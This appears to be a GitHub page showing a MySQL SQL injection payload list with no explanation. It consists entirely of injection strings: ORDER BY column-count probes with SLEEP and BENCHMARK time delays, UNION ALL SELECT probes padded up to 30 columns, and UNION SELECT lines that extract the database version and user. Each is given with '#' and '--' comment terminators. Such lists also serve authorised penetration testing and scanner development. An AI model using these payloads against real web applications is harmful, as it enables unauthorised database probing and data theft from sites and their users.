Skip to content
Permalink
master
Switch branches/tags
Go to file
 
 
Cannot retrieve contributors at this time
ORDER BY SLEEP(5)
ORDER BY 1,SLEEP(5)
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
ORDER BY SLEEP(5)#
ORDER BY 1,SLEEP(5)#
ORDER BY 1,SLEEP(5),3#
ORDER BY 1,SLEEP(5),3,4#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
ORDER BY SLEEP(5)--
ORDER BY 1,SLEEP(5)--
ORDER BY 1,SLEEP(5),3--
ORDER BY 1,SLEEP(5),3,4--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
UNION ALL SELECT 1
UNION ALL SELECT 1,2
UNION ALL SELECT 1,2,3
UNION ALL SELECT 1,2,3,4
UNION ALL SELECT 1,2,3,4,5
UNION ALL SELECT 1,2,3,4,5,6
UNION ALL SELECT 1,2,3,4,5,6,7
UNION ALL SELECT 1,2,3,4,5,6,7,8
UNION ALL SELECT 1,2,3,4,5,6,7,8,9
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
UNION ALL SELECT 1#
UNION ALL SELECT 1,2#
UNION ALL SELECT 1,2,3#
UNION ALL SELECT 1,2,3,4#
UNION ALL SELECT 1,2,3,4,5#
UNION ALL SELECT 1,2,3,4,5,6#
UNION ALL SELECT 1,2,3,4,5,6,7#
UNION ALL SELECT 1,2,3,4,5,6,7,8#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
UNION ALL SELECT 1--
UNION ALL SELECT 1,2--
UNION ALL SELECT 1,2,3--
UNION ALL SELECT 1,2,3,4--
UNION ALL SELECT 1,2,3,4,5--
UNION ALL SELECT 1,2,3,4,5,6--
UNION ALL SELECT 1,2,3,4,5,6,7--
UNION ALL SELECT 1,2,3,4,5,6,7,8--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
UNION SELECT @@VERSION,SLEEP(5),3
UNION SELECT @@VERSION,SLEEP(5),USER(),4
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
UNION SELECT @@VERSION,SLEEP(5),"'3
UNION SELECT @@VERSION,SLEEP(5),"'3'"#
UNION SELECT @@VERSION,SLEEP(5),USER(),4#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
UNION ALL SELECT USER()--
UNION ALL SELECT SLEEP(5)--
UNION ALL SELECT USER(),SLEEP(5)--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5)--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
